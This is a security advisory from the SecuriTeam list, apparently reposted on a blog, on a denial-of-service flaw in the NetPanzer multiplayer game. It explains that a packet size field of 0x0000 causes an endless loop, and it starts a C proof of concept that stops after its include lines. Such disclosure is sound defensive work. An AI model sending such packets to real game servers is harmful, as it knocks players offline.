The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
NetPanzer DoS
------------------------------------------------------------------------
SUMMARY
<http://netpanzer.berlios.de > NetPanzer is "an open source multiplayer
tactical game enough known and played". NetPanzer suffers from a denial of
service flaw caused by the program entering an endless loop.
DETAILS
Vulnerable Systems:
* NetPanzer version 0.8 and prior
Immune Systems:
* NetPanzer version 0.8 CVN fixed (
<http://developer.berlios.de/svn/?group_id=1250> here)
The network code doesn't verify the correctness of the 16 bit number
containing the size of the entire data block received from the network. If
an attacker sends the number 0x0000 (the minimum should be 0x0002) the
game enters in an endless loop and nobody can play.
Proof of concept:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/panzone.zip
*/
#include <stdio.h>
#include <stdlib.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
No comments:
Post a Comment